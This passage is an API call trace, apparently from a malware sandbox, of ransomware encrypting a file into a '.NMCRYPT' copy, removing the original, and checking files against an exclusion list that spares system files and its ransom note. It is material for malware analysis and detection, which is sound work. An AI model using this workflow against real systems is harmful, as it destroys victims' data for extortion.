returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.407] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.409] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.409] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.409] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0165.409] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.409] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad738) returned 1 [0165.409] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.409] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.409] wcslen (_String="\\\\?\\") returned 0x4 [0165.409] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad4b8) returned 1 [0165.409] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0165.410] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0165.410] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=237) returned 1 [0165.411] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xed, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0165.411] GetLastError () returned 0x0 [0165.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0165.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0165.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0165.521] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm") returned 1 [0165.521] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm")) returned 0 [0165.522] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" [0165.522] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0165.522] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFA05.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfa05.tmp")) returned 0xfa05 [0165.522] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFA05.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfa05.tmp"), dwFlags=0x1) returned 0 [0165.523] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFA05.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfa05.tmp")) returned 1 [0165.523] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0165.523] wcslen (_String="OK") returned 0x2 [0165.523] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.523] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.523] CryptDestroyKey (hKey=0x9ad738) returned 1 [0165.523] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0165.523] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*NMCRYPT") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*Recovers your files.html") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*.exe") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*.dll") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*.lnk") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*.bat") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*.ini") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*.msi") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*.scf") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*pagefile.sys*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*AppData*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*\\winrar\\*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*\\java\\*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*\\windows\\*") 